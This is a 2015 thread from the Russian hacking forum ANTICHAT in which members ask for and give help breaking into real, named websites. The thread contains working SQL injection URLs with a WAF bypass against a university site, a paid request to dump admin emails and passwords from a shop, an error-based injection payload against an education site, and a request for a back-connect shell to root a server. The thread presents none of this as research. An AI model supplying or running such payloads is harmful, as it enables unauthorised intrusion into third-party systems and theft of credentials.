ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.01.2015, 11:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
uname -a
Код:
Code:
Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64
хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций
Код:
Code:
Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd
php 5.3.3
подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта. Если апач+allowoverride включен, то можно попробовать ssi или cgi.
|
|
|
|
15.01.2015, 12:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Как обойти сей WAF?
Код:
Code:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,3+--+
True
Код:
Code:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,user()+--+
False |
|
|
|
15.01.2015, 12:45
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от MaxFast
MaxFast said:
Как обойти сей WAF?
Код:
Code:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,3+--+
True
Код:
Code:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,user()+--+
False WAF срабатывает на скобки:
true
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,@@version+--+
false
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,@@version+--+()
а вот собственно и таблички:
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,table_name+from+information_ schema.tables+limit+0,1+--+
и да, обрати внимание, что это " НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"
|
|
|
15.01.2015, 12:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64?
Хотя для char и base64 тоже нужны скобки.
|
|
|
|
15.01.2015, 15:47
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
urlencode, double urlencode, utf encode
|
|
|
|
16.01.2015, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Помогите со слепой скулей. скриптик написать или сдампить нужные данные.
https://www.ckbproducts.com/ship_estimator.php?action=process
POST
Сообщение от None
shipzone=ghffgjfgj&shippostcode=67966&shipcountry= 19'{SQL}
сдампить нужно
Сообщение от None
union+select+concat_ws(':',admin_id,admin_email_ad dress,admin_password)+from+admin+--+
если нужно вознаграждение - в пм или жабу) |
|
|
|
16.01.2015, 23:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
5283
Репутация:
0
|
|
На сайте есть файл crossdomain.xml с таким содержимым:
Как это можно использовать? |
|
|
|
17.01.2015, 11:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
1080
Репутация:
0
|
|
Blind
Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.
|
|
|
|
18.01.2015, 15:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
5818
Репутация:
0
|
|
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&re gion=2&sessionlogin=1%27
помогите раскрутить
|
|
|
|
18.01.2015, 15:35
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от nike001
nike001 said:
На сайте есть файл crossdomain.xml с таким содержимым:
Как это можно использовать? http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html
Сообщение от lion_art
lion_art said:
Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.
что именно не получается? составьте корректный запрос и все нормально
Сообщение от reuvenmatbil
reuvenmatbil said:
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&re gion=2&sessionlogin=1%27
помогите раскрутить
Код:
Code:
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4®ion=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2)))='1
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
